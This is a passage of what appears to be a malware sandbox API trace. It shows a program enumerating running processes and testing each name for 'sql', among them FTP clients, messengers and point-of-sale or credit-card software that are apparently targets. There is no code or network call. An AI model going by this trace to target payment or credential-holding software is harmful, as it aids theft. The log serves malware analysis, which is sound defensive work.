lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.243] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582810 [0219.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582810, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0219.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0219.243] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0219.243] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0219.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.244] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35826f0 [0219.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35826f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0219.244] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0219.244] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0219.245] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.246] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35828a0 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35828a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0219.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0219.246] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0219.246] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0219.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.247] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3582858 [0219.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3582858, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0219.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0219.247] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0219.247] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.248] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582888 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582888, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0219.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0219.248] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0219.248] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0219.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.249] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35828b8 [0219.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35828b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0219.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0219.250] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0219.250] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0219.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.251] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582930 [0219.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582930, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0219.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0219.251] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0219.251] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0219.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.252] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582990 [0219.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3582990, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0219.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0219.252] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0219.252] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0219.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.253] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582708 [0219.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3582708, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0219.253] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0219.253] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0219.253] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0219.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.254] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35832d8 [0219.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35832d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0219.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0219.254] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0219.254] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0219.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.256] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35842b0 [0219.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35842b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0219.256] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0219.256] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0219.256] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0219.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.257] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35842c8 [0219.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35842c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0219.257] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0219.257] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0219.257] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0219.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0219.258] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596208 [0219.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3596208, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0219.258] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0219.258] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0219.258] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0219.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0219.259] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596268 [0219.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3596268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0219.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0219.259] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0219.259] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0219.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.260] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35842f8 [0219.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35842f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0219.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0219.260] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0219.260] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0219.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.261] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584340 [0219.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3584340, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0219.262] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0219.262] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0219.262] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0219.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.263] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584358 [0219.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3584358, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0219.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0219.263] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0219.263] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0219.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0219.264] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3584898 [0219.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3584898, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0219.264] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0219.264] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0219.264] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0219.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0219.265] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3595ea8 [0219.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3595ea8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0219.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0219.265] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0219.265] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0219.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0219.266] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596188 [0219.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0219.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0219.266] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0219.266] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0219.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.267] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35849d0 [0219.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35849d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0219.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0219.267] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0219.267] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0219.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0219.268] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584a00 [0219.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3584a00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0219.268] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0219.268] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0219.268] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0219.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.269] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584a48 [0219.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3584a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0219.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0219.269] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0219.269] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0219.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.270] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596408 [0219.320] WideCharToMultiByte (in: CodePage=0x0, 